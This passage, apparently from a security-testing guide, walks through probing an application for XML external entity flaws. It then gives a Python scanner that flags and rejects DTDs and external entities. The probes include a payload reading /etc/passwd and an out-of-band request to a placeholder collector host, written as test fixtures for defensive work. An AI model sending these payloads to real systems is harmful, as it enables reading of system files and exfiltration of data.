The process to detect this kind of vulnerability is, in general, as follows:
- If possible, download an XML document generated by the application so that you know the structure it expects. If not, create a simple template like this one, which declares an external entity and then references it in the body:
  <?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
  ]>
  <foo>&xxe;</foo>
- See if it's possible to add a reference to an external resource. A trick commonly used by attackers is to point the reference at a server they control and then watch that server's logs for the request the parser makes when it resolves the entity (a reverse, out-of-band connection); the log entry looks something like this:
  GET 144.76.194.66 /XXE/ 10/29/15 1:02 PM Java/1.7.0_51
- If it's not possible to add an external reference but you receive an error, modify the request and submit a pair of tags to test:
  <cosa></cosa>
  If the error disappears, the parser accepts the tags as valid XML, so the application might be vulnerable.
- You can also try entering data before or in the middle of the tags, since the document needs to be valid for the parser and sometimes the parser expects a value:
  <cosa>Foo</cosa>
  <cosas><cosa>Foo</cosa></cosas>
- If this continues without any errors, try to create a reference to a resource, internal or external, and look at the result.
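From the defender's side, the same features that the procedure above relies on (a DOCTYPE, an external SYSTEM or PUBLIC entity, a parameter entity) are exactly what a validation layer should flag before the document ever reaches the real parser. The following Python script is an added example, not code from the original text: it scans an incoming XML body with expat handlers that only record DTD declarations and never resolve anything, then parses the document only if the scan is clean. The probe documents and the collector hostname are constructed for the example; the collector host is a placeholder, not a real target.

```python
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET

# Constructed sample: the local-file probe template from the procedure above.
PROBE_LOCAL_FILE = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>"""

# Constructed sample: the out-of-band variant, pointing at a placeholder
# collector host (collector.example is not a real server).
PROBE_OUT_OF_BAND = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://collector.example/XXE/" >
]>
<foo>&xxe;</foo>"""

# Constructed sample: a benign document of the shape the application normally sends.
BENIGN = b"""<?xml version="1.0"?>
<cosas><cosa>Foo</cosa></cosas>"""


def xxe_indicators(xml_bytes: bytes) -> list:
    """Return the DTD features in a document that enable XXE, resolving nothing.

    expat only fetches external entities when an ExternalEntityRefHandler is
    installed, and parameter-entity parsing is switched off explicitly, so the
    scan itself cannot trigger the file read or the out-of-band request.
    """
    findings = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append("doctype declared: %s" % name)
        if system_id or public_id:
            findings.append("external DTD: %s" % (system_id or public_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        kind = "parameter" if is_param else "general"
        if system_id or public_id:
            findings.append("external %s entity %s -> %s" % (kind, name, system_id or public_id))
        else:
            findings.append("internal %s entity %s" % (kind, name))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as exc:
        # Malformed input is reported too; the real parser would reject it anyway.
        findings.append("parse error: %s" % exc)
    return findings


def safe_parse(xml_bytes: bytes) -> ET.Element:
    """Parse only documents that carry no DTD at all; reject everything else."""
    findings = xxe_indicators(xml_bytes)
    if findings:
        raise ValueError("rejected: " + "; ".join(findings))
    return ET.fromstring(xml_bytes)


if __name__ == "__main__":
    for label, doc in (("local file", PROBE_LOCAL_FILE),
                       ("out of band", PROBE_OUT_OF_BAND),
                       ("benign", BENIGN)):
        print(label, "->", xxe_indicators(doc) or "clean")
```

Rejecting any DOCTYPE outright is the simplest robust policy for an application that exchanges data-only XML like the documents above: it needs no list of dangerous entity types and also blocks entity-expansion (billion laughs) payloads that use only internal entities. If the application legitimately needs a DTD, the same handlers can be narrowed to refuse only external and parameter entities.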